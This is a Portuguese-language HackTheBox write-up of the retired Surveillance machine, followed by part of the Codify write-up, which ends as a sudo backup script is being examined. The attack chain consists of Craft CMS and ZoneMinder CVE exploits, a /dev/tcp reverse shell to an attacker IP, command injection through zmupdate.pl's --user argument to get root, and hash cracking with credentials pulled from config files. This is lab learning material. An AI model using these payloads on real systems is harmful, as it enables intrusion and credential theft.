De acordo com o próprio site do Craft CMS, o Craft é um CMS flexível e fácil de usar para criar experiências digitais personalizadas na web e fora dela.

Buscando por vulnerabilidades encontramos a CVE-2023-41892 que é um Remote Code Execution

Aqui alteramos a Poc para que consigamos explorar a vulnerabilidade para realizar o upload do arquivo e executar os comandos remotos.

Agora com acesso ao shell:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# python3 CVE-2023-41892.py http://surveillance.htb/
[-] Get temporary folder and document root ...
[-] Write payload to temporary file ...
[-] Trigger imagick to write shell ...
[-] Done, enjoy the shell
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Como temos um shell com poucos recursos com esse shell vamos abrir em outra aba o pwncat, que é um shell com diversas funções:

┌──(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 9001
[16:57:07] Welcome to pwncat 🐈!                                                                                                     __main__.py:164

Agora vamos criar um arquivo chamado rev.sh com o seguinte conteúdo e executar:

$ cat /tmp/rev.sh
sh -i 5<> /dev/tcp/10.10.14.229/9001 0<&5 1>&5 2>&5
$ bash /tmp/rev.sh

Com isso temos nosso reserve shell no pwncat:

┌──(root㉿kali)-[/home/kali]
└─# pwncat-cs -lp 9001
[16:57:07] Welcome to pwncat 🐈!                                                                                                     __main__.py:164
[17:00:52] received connection from 10.129.39.90:48380                                                                                    bind.py:84
[17:00:57] 0.0.0.0:9001: upgrading from /usr/bin/dash to /usr/bin/bash                                                                manager.py:957
[17:01:00] 10.129.39.90:48380: registered new host w/ db                                                                              manager.py:957
(local) pwncat$                                                                                                                                     
(remote) www-data@surveillance:/var/www/html/craft/web/cpresources$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Com acesso podemos realizar uma enumeração e visualizando os usuários:

(remote) www-data@surveillance:/var/www/html/craft$ grep -i bash /etc/passwd
root:x:0:0:root:/root:/bin/bash
matthew:x:1000:1000:,,,:/home/matthew:/bin/bash
zoneminder:x:1001:1001:,,,:/home/zoneminder:/bin/bash

Aqui temos três usuários: matthew, zoneminder e root.

Buscando arquivos sensíveis encontramos o arquivo .env, que como o nome sugere é um arquivo contendo variáveis e seus valores, que a aplicação utiliza:

(remote) www-data@surveillance:/var/www/html/craft$ cat .env
# Read about configuration, here:
# https://craftcms.com/docs/4.x/config/

# The application ID used to to uniquely store session and cache data, mutex locks, and more
CRAFT_APP_ID=CraftCMS--070c5b0b-ee27-4e50-acdf-0436a93ca4c7

# The environment Craft is currently running in (dev, staging, production, etc.)
CRAFT_ENVIRONMENT=production

# The secure key Craft will use for hashing and encrypting data
CRAFT_SECURITY_KEY=2HfILL3OAEe5X0jzYOVY5i7uUizKmB2_

# Database connection settings
CRAFT_DB_DRIVER=mysql
CRAFT_DB_SERVER=127.0.0.1
CRAFT_DB_PORT=3306
CRAFT_DB_DATABASE=craftdb
CRAFT_DB_USER=craftuser
CRAFT_DB_PASSWORD=CraftCMSPassword2023!
CRAFT_DB_SCHEMA=
CRAFT_DB_TABLE_PREFIX=

# General settings (see config/general.php)
DEV_MODE=false
ALLOW_ADMIN_CHANGES=false
DISALLOW_ROBOTS=false

PRIMARY_SITE_URL=http://surveillance.htb/

Enumerando as portas abertas no host alvo notamos que existe um mysql na porta 3306 e outra aplicação na porta 8080, ambas rodando localmente:

(remote) www-data@surveillance:/var/www/html/craft$ netstat -nltp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      991/nginx: worker p
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      991/nginx: worker p
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
(remote) www-data@surveillance:/var/www/html/craft$

Com os dados que conseguimos podemos acessar o banco de dados:

(remote) www-data@surveillance:/var/www/html/craft$ mysql -u craftuser -h 127.0.0.1 -P 3306 -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 20621
Server version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| craftdb            |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)

MariaDB [(none)]> use craftdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [craftdb]> show tables;
+----------------------------+
| Tables_in_craftdb          |
+----------------------------+
| addresses                  |
| announcements              |
| assetindexdata             |
| assetindexingsessions      |
| assets                     |
| categories                 |
| categorygroups             |
| categorygroups_sites       |
| changedattributes          |
| changedfields              |
| content                    |
| craftidtokens              |
| deprecationerrors          |
| drafts                     |
| elements                   |
| elements_sites             |
| entries                    |
| entrytypes                 |
| fieldgroups                |
| fieldlayoutfields          |
| fieldlayouts               |
| fieldlayouttabs            |
| fields                     |
| globalsets                 |
| gqlschemas                 |
| gqltokens                  |
| imagetransformindex        |
| imagetransforms            |
| info                       |
| matrixblocks               |
| matrixblocks_owners        |
| matrixblocktypes           |
| migrations                 |
| plugins                    |
| projectconfig              |
| queue                      |
| relations                  |
| resourcepaths              |
| revisions                  |
| searchindex                |
| sections                   |
| sections_sites             |
| sequences                  |
| sessions                   |
| shunnedmessages            |
| sitegroups                 |
| sites                      |
| structureelements          |
| structures                 |
| systemmessages             |
| taggroups                  |
| tags                       |
| tokens                     |
| usergroups                 |
| usergroups_users           |
| userpermissions            |
| userpermissions_usergroups |
| userpermissions_users      |
| userpreferences            |
| users                      |
| volumefolders              |
| volumes                    |
| widgets                    |
+----------------------------+
63 rows in set (0.001 sec)

MariaDB [craftdb]> desc users;
+----------------------------+---------------------+------+-----+---------+-------+
| Field                      | Type                | Null | Key | Default | Extra |
+----------------------------+---------------------+------+-----+---------+-------+
| id                         | int(11)             | NO   | PRI | NULL    |       |
| photoId                    | int(11)             | YES  | MUL | NULL    |       |
| active                     | tinyint(1)          | NO   | MUL | 0       |       |
| pending                    | tinyint(1)          | NO   | MUL | 0       |       |
| locked                     | tinyint(1)          | NO   | MUL | 0       |       |
| suspended                  | tinyint(1)          | NO   | MUL | 0       |       |
| admin                      | tinyint(1)          | NO   |     | 0       |       |
| username                   | varchar(255)        | YES  | MUL | NULL    |       |
| fullName                   | varchar(255)        | YES  |     | NULL    |       |
| firstName                  | varchar(255)        | YES  |     | NULL    |       |
| lastName                   | varchar(255)        | YES  |     | NULL    |       |
| email                      | varchar(255)        | YES  | MUL | NULL    |       |
| password                   | varchar(255)        | YES  |     | NULL    |       |
| lastLoginDate              | datetime            | YES  |     | NULL    |       |
| lastLoginAttemptIp         | varchar(45)         | YES  |     | NULL    |       |
| invalidLoginWindowStart    | datetime            | YES  |     | NULL    |       |
| invalidLoginCount          | tinyint(3) unsigned | YES  |     | NULL    |       |
| lastInvalidLoginDate       | datetime            | YES  |     | NULL    |       |
| lockoutDate                | datetime            | YES  |     | NULL    |       |
| hasDashboard               | tinyint(1)          | NO   |     | 0       |       |
| verificationCode           | varchar(255)        | YES  | MUL | NULL    |       |
| verificationCodeIssuedDate | datetime            | YES  |     | NULL    |       |
| unverifiedEmail            | varchar(255)        | YES  |     | NULL    |       |
| passwordResetRequired      | tinyint(1)          | NO   |     | 0       |       |
| lastPasswordChangeDate     | datetime            | YES  |     | NULL    |       |
| dateCreated                | datetime            | NO   |     | NULL    |       |
| dateUpdated                | datetime            | NO   |     | NULL    |       |
+----------------------------+---------------------+------+-----+---------+-------+
27 rows in set (0.001 sec)

MariaDB [craftdb]> select admin,username,email,password from users;
+-------+----------+------------------------+--------------------------------------------------------------+
| admin | username | email                  | password                                                     |
+-------+----------+------------------------+--------------------------------------------------------------+
|     1 | admin    | admin@surveillance.htb | $2y$13$FoVGcLXXNe81B6x9bKry9OzGSSIYL7/ObcmQ0CXtgw.EpuNcx8tGe |
+-------+----------+------------------------+--------------------------------------------------------------+
1 row in set (0.000 sec)

No entanto, não tivemos sucesso tentando quebrar a hash de usuário.

Continuando a enumeração localizamos um arquivo de backup do banco de dados:

(remote) www-data@surveillance:/var/www/html/craft/storage$ cd backups/
(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ ls -alh
total 28K
drwxrwxr-x 2 www-data www-data 4.0K Oct 17 20:33 .
drwxr-xr-x 6 www-data www-data 4.0K Oct 11 20:12 ..
-rw-r--r-- 1 root     root      20K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip
(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ unzip surveillance--2023-10-17-202801--v4.4.14.sql.zip
Archive:  surveillance--2023-10-17-202801--v4.4.14.sql.zip
  inflating: surveillance--2023-10-17-202801--v4.4.14.sql
(remote) www-data@surveillance:/var/www/html/craft/storage/backups$ ls -alh
total 140K
drwxrwxr-x 2 www-data www-data 4.0K Dec 12 02:17 .
drwxr-xr-x 6 www-data www-data 4.0K Oct 11 20:12 ..
-rw-r--r-- 1 www-data www-data 111K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql
-rw-r--r-- 1 root     root      20K Oct 17 20:33 surveillance--2023-10-17-202801--v4.4.14.sql.zip

E aqui temos outro tipo de hash para o usuário:

INSERT INTO `users` VALUES (1,NULL,1,0,0,0,1,'admin','Matthew B','Matthew','B','admin@surveillance.htb','39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec','2023-10-17 20:22:34',NULL,NULL,NULL,'2023-10-11 18:58:57',NULL,1,NULL,NULL,NULL,0,'2023-10-17 20:27:46','2023-10-11 17:57:16','2023-10-17 20:27:46');

Esse tipo de hash é o SHA256 e aqui podemos utilizar o hashcat para quebrar a senha, utilizando o valor 1400 para o tipo de hash e especificando a wordlist rockyou.txt:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# hashcat -m 1400 matthew-hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
...

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344389
* Bytes.....: 139921546
* Keyspace..: 14344389

39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c9f35c675770ec:starcraft122490

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1400 (SHA2-256)
Hash.Target......: 39ed84b22ddc63ab3725a1820aaa7f73a8f3f10d0848123562c...5770ec
Time.Started.....: Mon Dec 11 21:32:28 2023 (2 secs)
Time.Estimated...: Mon Dec 11 21:32:30 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1596.7 kH/s (0.13ms) @ Accel:256 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 3552256/14344389 (24.76%)
Rejected.........: 0/3552256 (0.00%)
Restore.Point....: 3551232/14344389 (24.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: starfish789 -> starbowser
Hardware.Mon.#1..: Util: 42%

Started: Mon Dec 11 21:32:04 2023
Stopped: Mon Dec 11 21:32:31 2023

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# ssh matthew@surveillance.htb
matthew@surveillance.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Dec 12 02:34:21 AM UTC 2023

  System load:  0.08935546875     Processes:             233
  Usage of /:   85.1% of 5.91GB   Users logged in:       0
  Memory usage: 16%               IPv4 address for eth0: 10.129.45.83
  Swap usage:   0%

  => / is using 85.1% of 5.91GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


Last login: Tue Dec  5 12:43:54 2023 from 10.10.14.40

E assim conseguimos a user flag.

matthew@surveillance:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt
matthew@surveillance:~$ cat user.txt
b4ddc33ff47b1d8534c59a7609b48f13

Movimentação lateral

-rw-r--r-- 1 root zoneminder 3503 Oct 17 11:32 /usr/share/zoneminder/www/api/app/Config/database.php
        'password' => ZM_DB_PASS,
        'database' => ZM_DB_NAME,
        'host' => 'localhost',
        'password' => 'ZoneMinderPassword2023',
        'database' => 'zm',
                $this->default['host'] = $array[0];
            $this->default['host'] = ZM_DB_HOST;

Estes dados são pertencentes a uma aplicação chamada Zoneminder. O zoneminder é uma aplicação open source para monitoramento via circuito fechado de televisão, cameras de segurança basicamente.
Um ponto interessante é que temos outro usuário chamado zoneminder e uma aplicação rodando na porta 8080

Buscando por vulnerabilidades conhecidas para o zoneminder encontramos a CVE-2023-26035

Para conseguimos executar precisamos criar um túnel para que a aplicação local consiga ser acessada de nossa máquina, para isso vamos utilizar o ssh:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# ssh -L 8081:127.0.0.1:8080 matthew@surveillance.htb
matthew@surveillance.htb's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)

Iremos utilizar neste writeup esta POC.
Primeiramente iremos utilizar o pwncat para ouvir na porta 9002:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9002
[21:01:10] Welcome to pwncat 🐈!                                                                                                 __main__.py:164

Com o repositório devidamente clonado em nossa máquina executaremos da seguinte forma:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance/CVE-2023-26035]
└─# python3 exploit.py -t http://127.0.0.1:8081 -ip 10.10.14.174 -p 9002
[>] fetching csrt token
[>] recieved the token: key:f3dbd44dfe36d9bf315bcf7b9ad29a97463a4bb7,1702432913
[>] executing...
[>] sending payload..
[!] failed to send payload

Mesmo com a mensagem de falha no envio do payload temos o seguinte retorno em nosso pwncat:

┌──(root�kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9002
[21:01:10] Welcome to pwncat 🐈!                                                                                                 __main__.py:164
[21:01:55] received connection from 10.129.44.183:43356                                                                               bind.py:84
[21:02:04] 10.129.44.183:43356: registered new host w/ db                                                                         manager.py:957
(local) pwncat$                                                                                                                                 
(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ ls -lah /home/zoneminder/
total 20K
drwxr-x--- 2 zoneminder zoneminder 4.0K Nov  9 12:46 .
drwxr-xr-x 4 root       root       4.0K Oct 17 11:20 ..
lrwxrwxrwx 1 root       root          9 Nov  9 12:46 .bash_history -> /dev/null
-rw-r--r-- 1 zoneminder zoneminder  220 Oct 17 11:20 .bash_logout
-rw-r--r-- 1 zoneminder zoneminder 3.7K Oct 17 11:20 .bashrc
-rw-r--r-- 1 zoneminder zoneminder  807 Oct 17 11:20 .profile

Conseguindo assim shell como o usuário zoneminder. Mais uma vez iremos realizar uma enumeração.

Atráves do comando sudo conseguimos visualizar um comando que o usuário zoneminder consegue executar com permissões de root:

(remote) zoneminder@surveillance:/usr/share/zoneminder/www$ sudo -l
Matching Defaults entries for zoneminder on surveillance:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User zoneminder may run the following commands on surveillance:
    (ALL : ALL) NOPASSWD: /usr/bin/zm[a-zA-Z]*.pl *

Aqui estão todos os scripts que conseguimos executar como usuário root:

(remote) zoneminder@surveillance:/home/zoneminder$ ls -alh /usr/bin/zm*.pl
-rwxr-xr-x 1 root root  43K Nov 23  2022 /usr/bin/zmaudit.pl
-rwxr-xr-x 1 root root  13K Nov 23  2022 /usr/bin/zmcamtool.pl
-rwxr-xr-x 1 root root 6.0K Nov 23  2022 /usr/bin/zmcontrol.pl
-rwxr-xr-x 1 root root  26K Nov 23  2022 /usr/bin/zmdc.pl
-rwxr-xr-x 1 root root  35K Nov 23  2022 /usr/bin/zmfilter.pl
-rwxr-xr-x 1 root root 5.6K Nov 23  2022 /usr/bin/zmonvif-probe.pl
-rwxr-xr-x 1 root root  19K Nov 23  2022 /usr/bin/zmonvif-trigger.pl
-rwxr-xr-x 1 root root  14K Nov 23  2022 /usr/bin/zmpkg.pl
-rwxr-xr-x 1 root root  18K Nov 23  2022 /usr/bin/zmrecover.pl
-rwxr-xr-x 1 root root 4.8K Nov 23  2022 /usr/bin/zmstats.pl
-rwxr-xr-x 1 root root 2.1K Nov 23  2022 /usr/bin/zmsystemctl.pl
-rwxr-xr-x 1 root root  13K Nov 23  2022 /usr/bin/zmtelemetry.pl
-rwxr-xr-x 1 root root 5.3K Nov 23  2022 /usr/bin/zmtrack.pl
-rwxr-xr-x 1 root root  19K Nov 23  2022 /usr/bin/zmtrigger.pl
-rwxr-xr-x 1 root root  45K Nov 23  2022 /usr/bin/zmupdate.pl
-rwxr-xr-x 1 root root 8.1K Nov 23  2022 /usr/bin/zmvideo.pl
-rwxr-xr-x 1 root root 6.9K Nov 23  2022 /usr/bin/zmwatch.pl
-rwxr-xr-x 1 root root  20K Nov 23  2022 /usr/bin/zmx10.pl

Foi necessário descobrir o que cada script faz, no entanto, fica mais simples quando olhamos esta documentação.

Inicialmente vamos criar um arquivo chamado rev.sh com o seguinte conteúdo:

#!/bin/bash
sh -i 5<> /dev/tcp/10.10.14.229/9001 0<&5 1>&5 2>&5

E localmente em nossa máquina vamos utilizar o pwncat para ouvir na porta 9001:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9001
[17:14:01] Welcome to pwncat 🐈!                                                              __main__.py:164

(remote) zoneminder@surveillance:/home/zoneminder$ sudo /usr/bin/zmupdate.pl --version=1 --user='$(/home/zoneminder/rev.sh)' --pass=ZoneMinderPassword2023

Initiating database upgrade to version 1.36.32 from version 1

WARNING - You have specified an upgrade from version 1 but the database version found is 1.26.0. Is this correct?
Press enter to continue or ctrl-C to abort : 

Do you wish to take a backup of your database prior to upgrading?
This may result in a large file in /tmp/zm if you have a lot of events.
Press 'y' for a backup or 'n' to continue : y
Creating backup to /tmp/zm/zm-1.dump. This may take several minutes.

A senha do banco é a mesma que conseguimos anteriormente. E assim temos o seguinte retorno em nosso pwncat:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/surveillance]
└─# pwncat-cs -lp 9001
[17:14:01] Welcome to pwncat 🐈!                                                              __main__.py:164
[17:18:06] received connection from 10.129.42.193:39340                                            bind.py:84
[17:18:10] 0.0.0.0:9001: normalizing shell path                                                manager.py:957
[17:18:12] 0.0.0.0:9001: upgrading from /usr/bin/dash to /bin/bash                             manager.py:957
[17:18:14] 10.129.42.193:39340: registered new host w/ db                                      manager.py:957
(local) pwncat$                                                                                              
(remote) root@surveillance:/home/zoneminder# id
uid=0(root) gid=0(root) groups=0(root)

Conseguimos shell como root! Podemos buscar a root flag!

(remote) root@surveillance:/home/zoneminder# ls -a /root
.  ..  .bash_history  .bashrc  .cache  .config  .local  .mysql_history  .profile  root.txt  .scripts  .ssh
(remote) root@surveillance:/home/zoneminder# cat /root/root.txt 
4e69a27f8fc2279a0a149909c8ff2af4

Um ponto interessante agora que estamos como usuário root e visualizar nos processos como foi executado o comando de mysqldump:

(remote) root@surveillance:/home/zoneminder# ps aux | grep mysqldump
root        3035  0.0  0.0   2888  1064 pts/3    S+   22:18   0:00 sh -c mysqldump -u$(/home/zoneminder/rev.sh) -p'ZoneMinderPassword2023' -hlocalhost --add-drop-table --databases zm > /tmp/zm/zm-1.dump

Como planejamos o valor foi mantido inicialmente, somente na segunda execução que interpretou o caracter especial executando o comando.

E assim finalizamos a máquina Surveillence!

HackTheBox - Writeup Codify [Retired]

Guilherme Martins — Sat, 06 Apr 2024 16:56:23 +0000

Hackthebox

Neste writeup iremos explorar uma máquina linux de nível easy chamada Codify que aborda as seguintes vulnerabilidades e técnicas de exploração:

NodeJS SandBox Escape
Bad Practice with password re-use
Bash conditional abuse

Recon e user flag

Iremos iniciar realizando uma varredura no ip do alvo em busca de portas abertas utilizando o nmap:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/codify]
└─# nmap -sV --open -Pn 10.129.67.147
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-06 14:59 EST
Nmap scan report for 10.129.67.147
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.52
3000/tcp open  http    Node.js Express framework
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Existem três portas abertas no host:

22 é a porta do ssh,
80 esta rodando um Apache, que é um servidor web,
3000 esta rodando um aplicação em NodeJS, que é um framework para javascript.

Também temos o retorno do host utilizado (codify.htb), vamos adicionar em nosso /etc/hosts.

Acessando a porta 80 através do navegador temos um site que emula uma sandbox para testar código em NodeJS:

Clicando em Try it now somos redirecionados para o endpoint /editor:

Onde podemos executar códigos utilizando nodejs. E aqui encontramos nossa primeira vulnerabilidade.

No terminal vamos utilizar o netcat para ouvir na porta 9001:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/codify]
└─# nc -nvlp 9001
listening on [any] 9001 ...

E no editor vamos adicionar o seguinte código:

Dessa forma ao clicarmos em Run temos o seguinte retorno em nosso netcat:

┌──(root㉿kali)-[/home/kali/hackthebox/machines-linux/codify]
└─# nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.14.162] from (UNKNOWN) [10.129.67.147] 52094
bash: cannot set terminal process group (1238): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$

Conseguimos um shell como usuário svc!

Este usuário não possui a user flag, sendo necessário realizar uma movimentação lateral para outro usuário. Neste caso o usuário é joshua:

svc@codify:~$ ls -alh ..
ls -alh ..
total 16K
drwxr-xr-x  4 joshua joshua 4.0K Sep 12 17:10 .
drwxr-xr-x 18 root   root   4.0K Oct 31 07:57 ..
drwxrwx---  3 joshua joshua 4.0K Nov  2 12:22 joshua
drwxr-x---  4 svc    svc    4.0K Sep 26 10:00 svc

Podemos notar alguns serviços interessantes rodando no servidor e entender mais a fundo o funcionamento da aplicação em nodejs.

www-data    1167  0.0  0.1 1248900 5968 ?        Sl   19:57   0:00 /usr/sbin/apache2 -k start
www-data    1168  0.0  0.1 1249032 6632 ?        Sl   19:57   0:00 /usr/sbin/apache2 -k start
root        1233  0.0  2.0 1614296 79860 ?       Ssl  19:57   0:01 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
svc         1238  0.4  1.4 643260 58900 ?        Ssl  19:57   0:06 PM2 v5.3.0: God Daemon (/home/svc/.pm2)
svc         1256  0.3  1.5 654004 62572 ?        Sl   19:57   0:04 node /var/www/editor/index.js
svc         1257  0.2  1.5 653800 62548 ?        Sl   19:57   0:04 node /var/www/editor/index.js
svc         1273  0.2  1.5 653800 62460 ?        Sl   19:57   0:04 node /var/www/editor/index.js
svc         1277  0.2  1.5 653864 62032 ?        Sl   19:57   0:04 node /var/www/editor/index.js
svc         1463  0.3  1.5 654212 62852 ?        Sl   19:57   0:05 node /var/www/editor/index.js
root        1564  0.0  0.0   2888   956 ?        Ss   19:57   0:00 /bin/sh /root/scripts/other/docker-startup.sh
root        1565  0.2  0.8 190444 33940 ?        Sl   19:57   0:03 /usr/bin/python3 /usr/bin/docker-compose -f /root/scripts/docker/docker-compose.yml up
root        1634  0.0  0.0 1082092 2892 ?        Sl   19:57   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3306 -container-ip 172.19.0.2 -container-port 3306
root        1653  0.0  0.3 722280 12232 ?        Sl   19:57   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id f88b314ed6a4f84693267bda194d6266bdde5798ef5ccd082109b2566fda07f8 -address /run/containerd/containerd.sock
lxd         1673  0.0  2.5 1209952 101224 ?      Ssl  19:57   0:00 mariadbd
svc         1885  0.2  1.4 644132 59364 ?        Sl   20:11   0:01 node /var/www/editor/index.js

Temos um apache rodando que esta servindo de proxy reverso para a aplicação nodejs na porta 3000.

Também temos um docker rodando que possui um container para o banco de dados na porta 3306, que se trata de um MariaDB. Que é um MySQL open source.

Com essas infos temos diversos pontos para buscar formas de movimentação lateral e também escalação de privilégios.

Vamos analisar os arquivos da aplicação buscando encontrar algum dado sensível exposto.

Dentre os arquivos que chamaram a atenção se encontra o tickets.db:

svc@codify:/var/www/contact$ ls -lah
ls -lah
total 120K
drwxr-xr-x 3 svc  svc  4.0K Sep 12 17:45 .
drwxr-xr-x 5 root root 4.0K Sep 12 17:40 ..
-rw-rw-r-- 1 svc  svc  4.3K Apr 19  2023 index.js
-rw-rw-r-- 1 svc  svc   268 Apr 19  2023 package.json
-rw-rw-r-- 1 svc  svc   76K Apr 19  2023 package-lock.json
drwxrwxr-x 2 svc  svc  4.0K Apr 21  2023 templates
-rw-r--r-- 1 svc  svc   20K Sep 12 17:45 tickets.db

Esse é um arquivo sqlite utilizado pela app. Vamos realizar o download do mesmo e abrir utilizando o sqlite database browser.

E aqui podemos encontrar a seguinte informação:

Se trata de um hash para a senha do usuário joshua! Vamos salvar esse hash em um arquivo e utilizar o John The Ripper para quebrá-la:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/codify]
└─# john -w=/usr/share/wordlists/rockyou.txt joshua-hash 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1       (?)     
1g 0:00:00:39 DONE (2023-11-06 15:27) 0.02550g/s 34.88p/s 34.88c/s 34.88C/s crazy1..angel123
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Com essa senha encontramos outra má prática, que é reutilizar a senha em mais de um local. Pois com essa senha conseguimos acesso ssh com o usuário joshua e assim a user flag:

┌──(root㉿kali)-[~kali/hackthebox/machines-linux/codify]
└─# ssh joshua@codify.htb    
The authenticity of host 'codify.htb (10.129.67.147)' can't be established.
ED25519 key fingerprint is SHA256:Q8HdGZ3q/X62r8EukPF0ARSaCd+8gEhEJ10xotOsBBE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'codify.htb' (ED25519) to the list of known hosts.
joshua@codify.htb's password: 
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Nov  6 08:28:47 PM UTC 2023

  System load:                      0.0087890625
  Usage of /:                       69.1% of 6.50GB
  Memory usage:                     20%
  Swap usage:                       0%
  Processes:                        237
  Users logged in:                  0
  IPv4 address for br-030a38808dbf: 172.18.0.1
  IPv4 address for br-5ab86a4e40d0: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.129.67.147
  IPv6 address for eth0:            dead:beef::250:56ff:fe96:3567

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

joshua@codify:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile  user.txt  .vimrc
joshua@codify:~$ cat user.txt 
fd3367ba0f1f94ea8b5634db1e5bd2c0

Escalação de privilégios e root flag

Iremos iniciar visualizando as permissões que o usuário joshua possui:

joshua@codify:~$ sudo -ll
[sudo] password for joshua: 
Matching Defaults entries for joshua on codify:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User joshua may run the following commands on codify:

Sudoers entry:
    RunAsUsers: root
    Commands:
        /opt/scripts/mysql-backup.sh

Utilizando o comando sudo com a flag -ll conseguimos ver com mais detalhes as permissões de sudo que o usuário possui.

O usuário pode executar o script /opt/scripts/mysql-backup.sh com permissões de root. Vamos analisar o script:

joshua@codify:~$ cat /opt/scripts/mysql-backup.sh 
#!/bin/bash
DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
        /usr/bin/echo "Password confirmed!"
else
        /usr/bin/echo "Password confirmation failed!"
        exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"
/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
